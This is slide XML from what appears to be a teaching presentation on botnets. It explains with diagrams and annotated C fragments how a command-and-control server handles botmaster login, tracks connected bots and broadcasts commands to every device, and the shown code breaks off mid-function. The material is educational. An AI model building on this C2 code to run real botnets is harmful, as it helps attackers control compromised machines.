              <a:gd name="adj1" fmla="val -54653"/>
              <a:gd name="adj2" fmla="val -1059"/>
              <a:gd name="adj3" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E74C3C">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="E74C3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Text Box 30" descr="7b0a202020202262756c6c6574223a20227b5c2263617465676f727949645c223a31303030352c5c2274656d706c61746549645c223a32303233313537347d220a7d0a"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5707380" y="1480185"/>
            <a:ext cx="6079490" cy="2921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20090" indent="-539750" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip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The fd_set structure is used by various Windows Sockets functions and service providers, such as the select function, to place sockets into a "set" for various purposes, such as testing a given socket for readability using the readfds parameter of the select function.</a:t>
            </a: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90" indent="-539750" algn="l" fontAlgn="auto">
              <a:buSzPct val="150000"/>
              <a:buBlip>
                <a:blip r:embed="rId6"/>
              </a:buBlip>
            </a:pP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example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04130" y="1454785"/>
            <a:ext cx="754380" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill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net.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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8875" y="2253615"/>
            <a:ext cx="1025525" cy="362585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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login.c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900930" y="3046730"/>
            <a:ext cx="1161415" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill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server.c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770755" y="3845560"/>
            <a:ext cx="1421130" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill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interface.c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211955" y="4620895"/>
            <a:ext cx="1025525" cy="362585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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data.c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731510" y="4620895"/>
            <a:ext cx="1217295" cy="362585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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handler.c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355205" y="4620895"/>
            <a:ext cx="743585" cy="362585"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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io.c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11" name="直接箭头连接符 10"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="2"/>
            <a:endCxn id="3" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481320" y="1823085"/>
            <a:ext cx="635" cy="43053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>
            <p:custDataLst>
              <p:tags r:id="rId8"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481955" y="2619375"/>
            <a:ext cx="635" cy="43053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>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5482590" y="3415030"/>
            <a:ext cx="635" cy="43053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endCxn id="6" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4725035" y="4233545"/>
            <a:ext cx="405130" cy="38735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7" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5721350" y="4233545"/>
            <a:ext cx="619125" cy="38735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8" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5987415" y="2603500"/>
            <a:ext cx="1739900" cy="2017395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Text Box 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="171450" y="1017905"/>
            <a:ext cx="4349115" cy="2745740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CA3E9D">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr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this file sends the username to login.c (master)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if server receives "exit" or "quit" from master, do nothing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if server receives "bots" or "list", sends the number of bots to master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if server receives "command", it finally sends command to all connected devices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otherwise, server calls handler function to process the special request from the master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such as help_menu, cnc_details, display_banner, clear_screen in io.c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ext Box 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7065010" y="1219835"/>
            <a:ext cx="4047490" cy="621030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CA3E9D">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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this file establishes the connections to the server and also listens to the server.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8" name="直接箭头连接符 17"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="3" idx="3"/>
            <a:endCxn id="17" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId15"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5994400" y="1530350"/>
            <a:ext cx="1070610" cy="90487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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId16"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7200900" y="2177415"/>
            <a:ext cx="3965575" cy="760730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CA3E9D">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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this file creates sockets and establish connection to login.c (master) and other victims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0" name="直接箭头连接符 19"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="19" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId17"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6062345" y="2557780"/>
            <a:ext cx="1138555" cy="6731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22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId18"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8709025" y="3220720"/>
            <a:ext cx="3337560" cy="1881505"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CA3E9D">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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clear_screen: clear the screen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display_banner: display banner information.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help_menu: give the list of commands master can use.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cnc_details:print information:master CNC_IP, server port, master USERNAM.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 Box 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId19"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481320" y="5575300"/>
            <a:ext cx="4462780" cy="869950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CA3E9D">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="228600" indent="-114300" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="9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process the special request from the master.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indent="-114300" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="9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such as help_menu, cnc_details, display_banner, clear_screen in io.c.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ext Box 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId20"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="146050" y="5504815"/>
            <a:ext cx="4685665" cy="963930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CA3E9D">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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request command message to login.c (master)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read command from master.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indent="-114300" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="-50" checksum="3491110392"/>
                  <wpsdc:marlchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="100" checksum="1487870873"/>
                </a:ext>
              </a:extLst>
            </a:pP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send command to all devices that are connected to server.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5" name="直接箭头连接符 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="3"/>
            <a:endCxn id="21" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId21"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="8098790" y="4161790"/>
            <a:ext cx="610235" cy="64071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22"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3740785" y="4997450"/>
            <a:ext cx="901700" cy="4572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7" idx="2"/>
            <a:endCxn id="22" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId23"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6340475" y="4983480"/>
            <a:ext cx="1372235" cy="59182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23" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId24"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2343785" y="3763645"/>
            <a:ext cx="0" cy="28067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>
            <p:custDataLst>
              <p:tags r:id="rId25"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2346325" y="4045585"/>
            <a:ext cx="2423795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none" w="med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login.c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68675" y="2033270"/>
            <a:ext cx="40640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393815"/>
            <a:ext cx="12364085" cy="61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52083" y="1070610"/>
            <a:ext cx="11887835" cy="10059035"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr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void login(void) {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int sock_fd, conn_fd;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char login_buf[1000];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char pass_buf[1000];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char *login_message = "Login: ";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char *password_message = "Password: ";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char *good_login_message = "Sucessfully Authenticated!\n";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char *bad_login_message = "Invalid credentials!\n";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pthread_t cnc;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struct sockaddr_in sock;    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sock.sin_family = AF_INET;//ipv4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sock.sin_port = htons(ADMIN_PORT); //port 1233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sock.sin_addr.s_addr = inet_addr(CNC_IP);//127.0.0.1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1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sock_fd = socket(AF_INET, SOCK_STREAM, 0);</a:t>
            </a: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//The socket function creates a socket that is bound to a specific transport service provider.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//A socket type that provides sequenced, reliable, two-way, connection-based byte streams with an OOB data transmission mechanism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//If a value of 0 is specified, the caller does not wish to specify a protocol and the service provider will choose the protocol to use.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1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bind(sock_fd, (struct sockaddr *)&amp;sock, sizeof(sock))</a:t>
            </a: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1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listen(sock_fd, 128);</a:t>
            </a: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//places a socket in a state in which it is listening for an incoming connection.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1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conn_fd = accept(sock_fd, NULL, NULL);</a:t>
            </a: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//If the function succeeds, it returns a new socket (the "accepted" socket) that represents the connection to the client. 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display_banner(conn_fd);//send banner information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1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send(conn_fd, login_message, strlen(login_message), 0);</a:t>
            </a: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//send login message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1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read(conn_fd, login_buf, sizeof(login_buf));</a:t>
            </a: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//read message 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1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send(conn_fd, password_message, strlen(password_message), 0);</a:t>
            </a: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//send password message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1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read(conn_fd, pass_buf, sizeof(pass_buf));</a:t>
            </a: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//read message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if (strstr(login_buf, USERNAME) != NULL) { //admin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if (strstr(pass_buf, PASSWORD) != NULL) {//password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send(conn_fd, good_login_message, sizeof(good_login_message), 0);//success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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="15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c_server(conn_fd);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="15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} else {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send(conn_fd, bad_login_message, sizeof(bad_login_message), 0);//failure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}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} else {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send(conn_fd, bad_login_message, sizeof(bad_login_message), 0);//failure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}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close(sock_fd);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}</a:t>
            </a:r>
            <a:endParaRPr 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3056 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server.c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6393815"/>
            <a:ext cx="12364085" cy="61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Text Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="217805" y="1005205"/>
            <a:ext cx="11802745" cy="10969625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr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void c_server(int fd_user) {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struct sockaddr_in cnc_server;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for (i = 0; i &lt; MAX_DEVICES; i++) {//99999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ccon[i] = 0;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}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14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s_fd = socket(AF_INET, SOCK_STREAM, 0);</a:t>
            </a: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//The socket function creates a socket that is bound to a specific transport service provider.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14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setsockopt(s_fd, SOL_SOCKET, SO_REUSEADDR, (char *)&amp;nnum, sizeof(nnum));</a:t>
            </a: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//enable reusing local socket address.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cnc_server.sin_family = AF_INET;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cnc_server.sin_addr.s_addr = INADDR_ANY;//does not care what local address is assigned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cnc_server.sin_port = htons(CNC_PORT);//port 1337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14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bind(s_fd, (struct sockaddr *)&amp;cnc_server, sizeof(cnc_server));     </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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14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listen(s_fd, 3);//maximum length of the queue of pending incoming connections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="145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pthread_t thread_cli;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14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pthread_create(&amp;thread_cli, NULL, interface, fd_user);</a:t>
            </a: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//create a thread that runs interface function, parameter is the connection handle passed by login.c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l = sizeof(cnc_server);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while (1) {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FD_ZERO(&amp;fd_r);//Initializes set to the empty set. A set should always be cleared before using.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FD_SET(s_fd, &amp;fd_r);//Now fd_r contains the s_fd and can be used with select or poll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max = s_fd;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for (i = 0; i &lt; MAX_DEVICES; i++) {//find the largest handle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d = ccon[i];             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if (d &gt; 0) {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FD_SET(d, &amp;fd_r);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}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if (d &gt; max) {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max = d;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}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}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sz="14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active = select(max + 1, &amp;fd_r, NULL, NULL, NULL);</a:t>
            </a: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//The select function returns the total number of socket handles that are ready and contained in the fd_r structures.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//check if there is a readable socket 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if (FD_ISSET(s_fd, &amp;fd_r)) {//Checks to see if s_fd is a member of set and returns TRUE if so.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sz="14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if ((sns = accept(s_fd, (struct sockaddr *)&amp;cnc_server, (socklen_t *)&amp;l)) &lt; 0)</a:t>
            </a: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{This returned value is a handle for the socket on which the actual connection is made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exit(EXIT_FAILURE);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}              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DEVICE_COUNT++;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for (i = 0; i &lt; MAX_DEVICES; i++) {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if (ccon[i] == 0) {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    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="14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ccon[i] = sns</a:t>
            </a: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    break;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}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}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}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for (i = 0; i &lt; MAX_DEVICES; i++) {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d = ccon[i];              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if (FD_ISSET(d, &amp;fd_r)) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="145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if ((r_data = read(d, sb, 1024)) == 0)</a:t>
            </a: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{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    --DEVICE_COUNT;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    close(d);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    ccon[i] = 0;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    }                  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    }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    }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    }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>
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1450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 sz="145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463542 -0.78583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6393815"/>
            <a:ext cx="12364085" cy="61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interface.c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Text Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264160" y="1017270"/>
            <a:ext cx="5753735" cy="5754370"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr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void *interface(void *fd_user) {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fd_user = (int *)fd_user;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char buffer[1024];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char cmd_line[64];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sprintf(cmd_line, "\n%s@Бotлet~# ", USERNAME);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while (1) {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send(fd_user, cmd_line, strlen(cmd_line), 0);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read(fd_user, buffer, sizeof(buffer));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if (strstr(buffer, "exit") || strstr(buffer, "quit") != NULL) {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    break;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} </a:t>
            </a:r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else if (strstr(buffer, "bots") || strstr(buffer, "list") != NULL)</a:t>
            </a:r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{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    char *botcount = "\nBots -&gt; ";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    char display_bots[64];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    sprintf(display_bots, "%d\n", DEVICE_COUNT);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send(fd_user, botcount, strlen(botcount), 0);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send(fd_user, display_bots, strlen(display_bots), 0);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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} </a:t>
            </a:r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else if (strstr(buffer, "command") != NULL)</a:t>
            </a:r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{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send_command(fd_user);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} else {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sz="16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handler(buffer, fd_user);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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    }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   }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>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6017895" y="1017270"/>
            <a:ext cx="5758815" cy="5046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00000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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this function sends the username to login.c (master)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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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if server receives "exit" or "quit" from master, do nothing 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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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if server receives "bots" or "list", sends the number of bots to master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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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if server receives "command", it finally sends command to all connected devices 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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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otherwise, server calls handler function to process the special request from the master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Clr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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such as help_menu, cnc_details, display_banner, clear_screen in io.c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handler.c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Text Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2159635" y="1017270"/>
            <a:ext cx="7872730" cy="4326890"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F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struct function botnet_commands[] = {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    {"?", help_menu},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    {"help", help_menu},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    {"server", cnc_details},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    {"banner", display_banner},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    {"clear", clear_screen},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    {"cls", clear_screen},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};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enum {commands_amount = sizeof(botnet_commands) / sizeof(botnet_commands[0])};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void handler(char buffer[1024], int fd_user) {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    for (int i = 0; i &lt; commands_amount; i++) {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        if (strstr(buffer, botnet_commands[i].buffer) != NULL) {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            return (*botnet_commands[i].function)(fd_user);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        }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    }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9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>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429895" y="5293360"/>
            <a:ext cx="9739630" cy="1010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30000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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process the special request from the master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0000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="m"/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such as help_menu, cnc_details, display_banner, clear_screen in io.c   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What is Botnets?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object 2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476250" y="1023620"/>
            <a:ext cx="10701020" cy="5199380"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135534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 marR="344805" indent="-18034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Botnet</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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3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3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compromised</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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  <a:r>
              <a:rPr sz="3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sz="3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3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3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10" dirty="0"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en-US" sz="3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attacker.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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Botnets</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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consist</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3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25" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>of:</a:t>
            </a:r>
            <a:endParaRPr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90" lvl="1" indent="-342900" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1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herder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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="25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500" spc="-7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attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-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controlling</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-2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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-4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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-1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network</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-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(also</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-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called</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2500" spc="-3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sz="2500" spc="-4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Botmaster).</a:t>
            </a:r>
            <a:endParaRPr sz="25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20090" lvl="1" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buSzTx/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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="25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 compromised computers under the Bot herders control (also called zombies, or drones).</a:t>
            </a:r>
            <a:endParaRPr sz="25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20090" lvl="1" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buSzTx/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 Client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9795" marR="5080" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="25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The malicious trojan installed on a compromised machine that connects it to the Botnet.</a:t>
            </a:r>
            <a:endParaRPr sz="25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20090" lvl="1" indent="-342900" algn="l" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="D1202F"/>
              </a:buClr>
              <a:buSzTx/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and Control Channel (C&amp;C)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9795" fontAlgn="auto">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="25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The communication channel the Bot herder uses to remotely control the bots.</a:t>
            </a:r>
            <a:endParaRPr sz="25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data.c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Text Box 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2357438" y="1017270"/>
            <a:ext cx="7477125" cy="4062730"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D1202F">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="D1202F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80000"/>
              </a:lnSpc>
            </a:pP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void send_command(int fd_user) {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char command_buf[1024];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char command_msg[1024];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char command_sent_msg[1024] = "Command successfully sent to all devices!\n";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sprintf(command_msg, "\n%s@Бotлet-[Enter Command]~# ", USERNAME);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send(fd_user, command_msg, strlen(command_msg), 0);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sz="17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read(fd_user, command_buf, sizeof(command_buf));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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for (i = 0; i &lt; MAX_DEVICES; i++) {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d = ccon[i];        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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="17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if (FD_ISSET(d, &amp;fd_r))</a:t>
            </a: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{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</a:t>
            </a:r>
            <a:r>
